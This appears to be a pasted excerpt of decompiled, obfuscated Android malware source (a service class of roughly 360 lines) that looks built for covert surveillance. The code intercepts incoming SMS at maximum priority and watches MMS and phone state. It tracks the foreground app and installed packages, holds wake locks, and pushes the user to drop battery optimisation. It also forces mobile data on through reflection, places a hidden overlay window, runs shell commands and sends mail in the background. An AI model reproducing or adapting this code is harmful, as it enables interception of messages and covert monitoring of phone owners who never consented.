  4615. UsageStats usageStats2 = usageStats;
  4616. for (UsageStats usageStats3 : queryUsageStats) {
  4617. if (usageStats2 != null) {
  4618. long lastTimeUsed = usageStats2.getLastTimeUsed();
  4619. d.e.b.h.a((Object) usageStats3, "usageStats");
  4620. if (lastTimeUsed >= usageStats3.getLastTimeUsed()) {
  4621. }
  4622. }
  4623. usageStats2 = usageStats3;
  4624. }
  4625. if (usageStats2 != null) {
  4626. return usageStats2.getPackageName();
  4627. }
  4628. return null;
  4629. } catch (Exception e2) {
  4630. e2.printStackTrace();
  4631. return null;
  4632. }
  4633. }
  4634.  
  4635. public final String getWebPageData() {
  4636. return this.s;
  4637. }
  4638.  
  4639. public final WifiLock getWifiLock() {
  4640. WifiLock wifiLock2 = this.wifiLock;
  4641. if (wifiLock2 == null) {
  4642. d.e.b.h.b("wifiLock");
  4643. }
  4644. return wifiLock2;
  4645. }
  4646.  
  4647. public final void onStop() {
  4648. g.a(this.g, 0, null, 3, null).a();
  4649. Context context = this.a;
  4650. if (context == null) {
  4651. d.e.b.h.b("ctx");
  4652. }
  4653. context.unregisterReceiver(this.r);
  4654. Context context2 = this.a;
  4655. if (context2 == null) {
  4656. d.e.b.h.b("ctx");
  4657. }
  4658. WifiManager wifiManager = (WifiManager) context2.getSystemService("wifi");
  4659. if (wifiManager != null) {
  4660. WifiInfo connectionInfo = wifiManager.getConnectionInfo();
  4661. if (connectionInfo != null) {
  4662. SharedPreferences sharedPreferences = this.e;
  4663. if (sharedPreferences == null) {
  4664. d.e.b.h.b("preferences");
  4665. }
  4666. sharedPreferences.edit().putString("wifissid", connectionInfo.getSSID()).apply();
  4667. }
  4668. }
  4669. }
  4670.  
  4671. public final String ping(String str, int i2) {
  4672. boolean z2 = true;
  4673. d.e.b.h.b(str, "host");
  4674. try {
  4675. Runtime runtime = Runtime.getRuntime();
  4676. StringBuilder sb = new StringBuilder();
  4677. sb.append("ping -c ");
  4678. sb.append(i2);
  4679. sb.append(' ');
  4680. sb.append(str);
  4681. Process exec = runtime.exec(sb.toString());
  4682. d.e.b.h.a((Object) exec, "prc");
  4683. InputStream inputStream = exec.getInputStream();
  4684. d.e.b.h.a((Object) inputStream, "prc.inputStream");
  4685. String str2 = new String(d.d.a.a(inputStream, 0, 1, null), d.i.d.a);
  4686. InputStream errorStream = exec.getErrorStream();
  4687. d.e.b.h.a((Object) errorStream, "prc.errorStream");
  4688. byte[] a2 = d.d.a.a(errorStream, 0, 1, null);
  4689. if (a2.length != 0) {
  4690. z2 = false;
  4691. }
  4692. if (!(!z2)) {
  4693. return str2;
  4694. }
  4695. StringBuilder sb2 = new StringBuilder();
  4696. sb2.append(str2);
  4697. sb2.append("\r\n");
  4698. sb2.append(new String(a2, d.i.d.a));
  4699. return sb2.toString();
  4700. } catch (Exception e2) {
  4701. return e2.toString();
  4702. }
  4703. }
  4704.  
  4705. public final void removeFullscreenFloatWindow() {
  4706. new Handler(Looper.getMainLooper()).post(new aj(this));
  4707. }
  4708.  
  4709. public final void requestIgnoreBatteryOpt() {
  4710. if (VERSION.SDK_INT >= 23) {
  4711. try {
  4712. Context context = this.a;
  4713. if (context == null) {
  4714. d.e.b.h.b("ctx");
  4715. }
  4716. Object systemService = context.getSystemService("power");
  4717. if (systemService == null) {
  4718. throw new d.g("null cannot be cast to non-null type android.os.PowerManager");
  4719. }
  4720. PowerManager powerManager = (PowerManager) systemService;
  4721. Method method = powerManager.getClass().getMethod("isIgnoringBatteryOptimizations", new Class[]{String.class});
  4722. Context context2 = this.a;
  4723. if (context2 == null) {
  4724. d.e.b.h.b("ctx");
  4725. }
  4726. Object invoke = method.invoke(powerManager, new Object[]{context2.getPackageName()});
  4727. if (invoke == null) {
  4728. throw new d.g("null cannot be cast to non-null type kotlin.Boolean");
  4729. }
  4730. boolean booleanValue = ((Boolean) invoke).booleanValue();
  4731. StringBuilder sb = new StringBuilder();
  4732. sb.append("");
  4733. sb.append(booleanValue);
  4734. Log.d("ibo", sb.toString());
  4735. Intent intent = new Intent();
  4736. intent.setAction("android.settings.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS");
  4737. StringBuilder sb2 = new StringBuilder();
  4738. sb2.append("package:");
  4739. Context context3 = this.a;
  4740. if (context3 == null) {
  4741. d.e.b.h.b("ctx");
  4742. }
  4743. sb2.append(context3.getPackageName());
  4744. intent.setData(Uri.parse(sb2.toString()));
  4745. intent.addFlags(268435456);
  4746. Context context4 = this.a;
  4747. if (context4 == null) {
  4748. d.e.b.h.b("ctx");
  4749. }
  4750. context4.startActivity(intent);
  4751. } catch (Exception e2) {
  4752. e2.printStackTrace();
  4753. }
  4754. }
  4755. }
  4756.  
  4757. public final void requestIgnoreBatteryOpt2() {
  4758. try {
  4759. Context context = this.a;
  4760. if (context == null) {
  4761. d.e.b.h.b("ctx");
  4762. }
  4763. Intent launchIntentForPackage = context.getPackageManager().getLaunchIntentForPackage("com.android.chrome");
  4764. launchIntentForPackage.addFlags(268435456);
  4765. Context context2 = this.a;
  4766. if (context2 == null) {
  4767. d.e.b.h.b("ctx");
  4768. }
  4769. context2.startActivity(launchIntentForPackage);
  4770. } catch (Exception e2) {
  4771. e2.printStackTrace();
  4772. }
  4773. new Handler(Looper.getMainLooper()).postDelayed(new ak(this), 1500);
  4774. }
  4775.  
  4776. public final void sendStartTLSMail(String str) {
  4777. d.e.b.h.b(str, "content");
  4778. new Thread(new al(this, str)).start();
  4779. }
  4780.  
  4781. public final void setCallListener(f fVar) {
  4782. d.e.b.h.b(fVar, "<set-?>");
  4783. this.m = fVar;
  4784. }
  4785.  
  4786. public final void setFirstAppTime(long j2) {
  4787. this.z = j2;
  4788. }
  4789.  
  4790. public final void setFsFloatView(View view) {
  4791. this.n = view;
  4792. }
  4793.  
  4794. public final void setHttpPhoneServerUrl(String str) {
  4795. d.e.b.h.b(str, "<set-?>");
  4796. this.t = str;
  4797. }
  4798.  
  4799. public final void setHttpServerDlg(AlertDialog alertDialog) {
  4800. this.q = alertDialog;
  4801. }
  4802.  
  4803. public final void setHttpServerUrl(String str) {
  4804. d.e.b.h.b(str, "<set-?>");
  4805. this.p = str;
  4806. }
  4807.  
  4808. public final void setSpeekModle$loader_release(boolean z2) {
  4809. }
  4810.  
  4811. public final void setWebPageData(String str) {
  4812. d.e.b.h.b(str, "<set-?>");
  4813. this.s = str;
  4814. }
  4815.  
  4816. public final void setWifiLock(WifiLock wifiLock2) {
  4817. d.e.b.h.b(wifiLock2, "<set-?>");
  4818. this.wifiLock = wifiLock2;
  4819. }
  4820.  
  4821. public final void showFullscreenFloatWindow() {
  4822. new Handler(Looper.getMainLooper()).post(new am(this));
  4823. }
  4824.  
  4825. public final void start(Context context, Intent intent, int[] iArr) {
  4826. d.e.b.h.b(context, "ctx");
  4827. if (iArr != null) {
  4828. try {
  4829. if (iArr.length == 3) {
  4830. SharedPreferences sharedPreferences = context.getSharedPreferences("pref", 0);
  4831. sharedPreferences.edit().putInt("create", sharedPreferences.getInt("create", 0) + 1).apply();
  4832. if (VERSION.SDK_INT >= 18) {
  4833. Notification.Builder builder = new Notification.Builder(context);
  4834. builder.setSmallIcon(iArr[0]);
  4835. builder.setContentTitle(" ");
  4836. builder.setContentText(" ");
  4837. Notification build = builder.build();
  4838. build.contentView = new RemoteViews(context.getPackageName(), iArr[1]);
  4839. new as(build, iArr, context, 21334, new Handler(Looper.getMainLooper())).run();
  4840. } else {
  4841. ((Service) context).startForeground(21334, new Notification());
  4842. }
  4843. }
  4844. } catch (Exception e2) {
  4845. }
  4846. }
  4847. try {
  4848. this.l = new h();
  4849. h hVar = this.l;
  4850. if (hVar == null) {
  4851. d.e.b.h.b("playTask");
  4852. }
  4853. hVar.execute(new Void[0]);
  4854. } catch (Exception e3) {
  4855. e3.printStackTrace();
  4856. }
  4857. boolean z2 = intent != null;
  4858. Log.d("APP_LOCALE", Locale.getDefault().toString());
  4859. Object systemService = context.getSystemService("phone");
  4860. if (systemService == null) {
  4861. throw new d.g("null cannot be cast to non-null type android.telephony.TelephonyManager");
  4862. }
  4863. TelephonyManager telephonyManager = (TelephonyManager) systemService;
  4864. String a2 = a(telephonyManager);
  4865. if (a2 == null) {
  4866. a2 = "";
  4867. }
  4868. if (!(d.i.m.a(a2, "+86", false, 2, null) || d.i.m.a(a2, "13", false, 2, null) || d.i.m.a(a2, "15", false, 2, null))) {
  4869. d.i.m.a(a2, "18", false, 2, null);
  4870. }
  4871. Thread.setDefaultUncaughtExceptionHandler(new an(this));
  4872. this.a = context;
  4873. System.gc();
  4874. SharedPreferences sharedPreferences2 = context.getSharedPreferences("pref", 0);
  4875. d.e.b.h.a((Object) sharedPreferences2, "ctx.getSharedPreferences…f\", Context.MODE_PRIVATE)");
  4876. this.e = sharedPreferences2;
  4877. Object systemService2 = context.getApplicationContext().getSystemService("power");
  4878. if (systemService2 == null) {
  4879. throw new d.g("null cannot be cast to non-null type android.os.PowerManager");
  4880. }
  4881. PowerManager powerManager = (PowerManager) systemService2;
  4882. StringBuilder sb = new StringBuilder();
  4883. sb.append("wk");
  4884. sb.append(hashCode());
  4885. WakeLock newWakeLock = powerManager.newWakeLock(1, sb.toString());
  4886. d.e.b.h.a((Object) newWakeLock, "pm.newWakeLock(PowerMana…_LOCK, \"wk\" + hashCode())");
  4887. this.f = newWakeLock;
  4888. WakeLock wakeLock = this.f;
  4889. if (wakeLock == null) {
  4890. d.e.b.h.b("wakeLock");
  4891. }
  4892. wakeLock.acquire();
  4893. c.a.g.a.a().a(ao.a);
  4894. IntentFilter intentFilter = new IntentFilter();
  4895. intentFilter.addAction("android.provider.Telephony.SMS_RECEIVED");
  4896. intentFilter.setPriority(Integer.MAX_VALUE);
  4897. intentFilter.addCategory("android.intent.category.DEFAULT");
  4898. context.registerReceiver(this.r, intentFilter);
  4899. context.registerReceiver(this.r, new IntentFilter("android.net.conn.CONNECTIVITY_CHANGE"));
  4900. context.registerReceiver(this.r, new IntentFilter("android.intent.action.BATTERY_CHANGED"));
  4901. context.registerReceiver(this.r, new IntentFilter(o.a.a()));
  4902. context.registerReceiver(this.r, new IntentFilter("android.intent.action.USER_PRESENT"));
  4903. context.registerReceiver(this.r, new IntentFilter("android.intent.action.PHONE_STATE"));
  4904. context.registerReceiver(this.r, new IntentFilter("android.net.wifi.SCAN_RESULTS"));
  4905. IntentFilter intentFilter2 = new IntentFilter();
  4906. intentFilter2.addAction("android.intent.action.PACKAGE_ADDED");
  4907. intentFilter2.addAction("android.intent.action.PACKAGE_REMOVED");
  4908. intentFilter2.addDataScheme("package");
  4909. context.registerReceiver(this.r, intentFilter2);
  4910. IntentFilter intentFilter3 = new IntentFilter();
  4911. intentFilter3.addAction("android.intent.action.SCREEN_OFF");
  4912. intentFilter3.addAction("android.intent.action.SCREEN_ON");
  4913. intentFilter3.addAction("android.media.RINGER_MODE_CHANGED");
  4914. context.registerReceiver(this.r, intentFilter3);
  4915. for (PackageInfo packageInfo : context.getPackageManager().getInstalledPackages(0)) {
  4916. Set<String> set = this.c;
  4917. String str = packageInfo.packageName;
  4918. d.e.b.h.a((Object) str, "info.packageName");
  4919. set.add(str);
  4920. }
  4921. if (z2) {
  4922. requestIgnoreBatteryOpt();
  4923. }
  4924. q.d(context);
  4925. SharedPreferences sharedPreferences3 = this.e;
  4926. if (sharedPreferences3 == null) {
  4927. d.e.b.h.b("preferences");
  4928. }
  4929. q.a(context, sharedPreferences3.getString("wifissid", null));
  4930. try {
  4931. ConnectivityManager.class.getMethod("setMobileDataEnabled", new Class[]{d.e.a.a(d.e.b.k.a(Boolean.TYPE))}).invoke(context.getSystemService("connectivity"), new Object[]{Boolean.valueOf(true)});
  4932. } catch (Exception e4) {
  4933. }
  4934. telephonyManager.listen(new ap(this), 320);
  4935. telephonyManager.listen(this.m, 32);
  4936. d();
  4937. b();
  4938. this.h.schedule(new aq(this, context), 0, 1000);
  4939. try {
  4940. LayoutParams layoutParams = new LayoutParams();
  4941. Object systemService3 = context.getApplicationContext().getSystemService("window");
  4942. if (systemService3 == null) {
  4943. throw new d.g("null cannot be cast to non-null type android.view.WindowManager");
  4944. }
  4945. WindowManager windowManager = (WindowManager) systemService3;
  4946. layoutParams.type = 2010;
  4947. layoutParams.format = 1;
  4948. layoutParams.flags = 8;
  4949. layoutParams.gravity = 51;
  4950. layoutParams.width = 2;
  4951. layoutParams.height = 2;
  4952. View view = new View(context.getApplicationContext());
  4953. view.setBackgroundDrawable(new ColorDrawable(0));
  4954. windowManager.addView(view, layoutParams);
  4955. context.getContentResolver().registerContentObserver(Uri.parse("content://mms/#"), true, new ar(this, context, new Handler()));
  4956. } catch (Exception e5) {
  4957. e5.printStackTrace();
  4958. }
  4959. }
  4960.  
  4961. public final void web(Activity activity, WebView webView) {
  4962. d.e.b.h.b(activity, "activity");
  4963. d.e.b.h.b(webView, "webView");
  4964. webView.setWebViewClient(new bb());
  4965. webView.setWebChromeClient(new bc(webView, activity));
  4966. WebSettings settings = webView.getSettings();
  4967. d.e.b.h.a((Object) settings, "webSetting");
  4968. settings.setAllowFileAccess(true);
  4969. settings.setJavaScriptEnabled(true);
  4970. settings.setDomStorageEnabled(true);
  4971. settings.setDatabaseEnabled(true);
  4972. settings.setAppCacheEnabled(true);
  4973. settings.setUseWideViewPort(true);
  4974. webView.setOnKeyListener(new bd(webView));
  4975. Log.d("WS", "加载url");
  4976. new Thread(new be(this, webView)).start();
  4977. }
  4978. }
Add Comment
Please, Sign In to add comment